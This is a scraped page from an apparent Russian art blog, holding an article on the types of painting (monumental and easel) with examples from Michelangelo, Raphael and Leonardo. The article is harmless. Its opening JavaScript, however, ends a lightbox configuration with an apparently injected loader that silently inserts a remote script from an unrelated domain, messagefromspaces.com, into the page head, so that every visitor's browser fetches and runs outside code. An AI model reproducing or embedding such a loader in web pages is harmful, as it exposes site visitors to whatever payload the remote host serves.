, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Виды живописи

Автор: Дмитрий Алмазов | 02 Май 2013

Живопись традиционно определяют как вид изобразительного искусства, основная задача которого сводится к передаче зрительных образов посредством нанесения красок на какую-либо основу. Но возникает вопрос, любое ли изображение можно считать произведением искусства?  На что именно должен быть нанесен рисунок, чтобы считаться живописью?

Возникнув еще во времена палеолита, о чем свидетельствуют наскальные рисунки, живопись за много тысячелетий меняла техники письма, увеличивала жанры и методы, но ключевым параметром выделения видов живописи является поверхность, на которую нанесено изображение. Знакомясь с произведениями живописи по репродукциям, мало кто задумывается, на какой основе создан оригинал. Тем не менее, многие шедевры великих художников были не самостоятельными картинами, а украшали стены храмов и дворцов. Тому подтверждение восхитительные фрески Микеланджело на сводах Сикстинской капеллы, станцы Рафаэля, иконы церкви Спаса Преображения в Новгороде, созданные Феофаном Греком, и другие творения классиков мирового искусства.

Сотворение АдамаДействительно, в сознании современного человека произведения художников – это в первую очередь живописные холсты, хотя традиция создавать картины на стенах зданий возникла гораздо раньше. На сегодняшний день выделены два основных вида живописи: станковая и монументальная.

Монументальная живопись – буквально живопись на неподвижной основе, как искусствоведческая единица является элементом  архитектурного сооружения. Такого рода картины не просто украшают здания, но представляют собой особую художественную форму, поскольку их восприятие ориентировано на движение взгляда от одной точки к другой, к тому же должно сохранять или усиливать эмоциональное воздействие всего ансамбля. Как правило, художники пишут сюжет, в котором рассказывается какая-либо история (часто на библейские темы), и таким образом, следуя вдоль стены, можно наблюдать динамику действия. Или же, напротив, живописец вправе соединить в определенном месте события, происходившие в разные временные и пространственные отрезки. Обычно так расписываются своды храмов. Необходимым условием создания монументальной живописи является использование долговечных материалов, так как роспись должна существовать так же долго, как здание, которому она принадлежит, поэтому техниками были выбраны фреска, мозаика, витраж и живопись темперой, известные своей неизменностью во времени, и сейчас мы можем увидеть древние картины, сохранившиеся в первозданном великолепии.

художник  Габриель фон МаксДругой вид живописи, а именно станковая, представляет собой произведения, имеющие самостоятельную художественную ценность и выполненные на поверхностях, которые можно переместить (как правило, это холст, доска, картон, бумага, шёлк). Станковая живопись является основным видом изобразительного искусства, в котором реализовано наибольшее количество жанров, стилей и направлений, а также возможны эксперименты техники письма. Чаще всего при создании работ художники используют масляные, акриловые, темперные краски, гуашь, пастель, тушь. Именно произведения станковой живописи собраны в коллекции и выставлены в музеях и галереях. Особенностью этого вида живописи является то, что картины воспринимаются независимо от обстановки, являют собой самоцель в искусстве. Тем не менее великими мастерами написаны шедевры художественного творчества, которые создают свой микрокосм и которые способны управлять чувствами смотрящего, а, возможно, и менять их в зависимости от угла зрения, эмоционального состояния и даже морального облика наблюдателя. Тому пример влияние «Джоконды» Да Винчи на разных людей: одним она видится с легкой улыбкой, другие же не могут выносить её взгляда и готовы уничтожить, поэтому на картину было совершено несколько покушений. Или же потрясающее свойство «Платка святой Вероники» Габриеля фон Макса, где Христа можно увидеть с открытыми или закрытыми глазами, если смотреть на холст с разных сторон.

Темы: о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress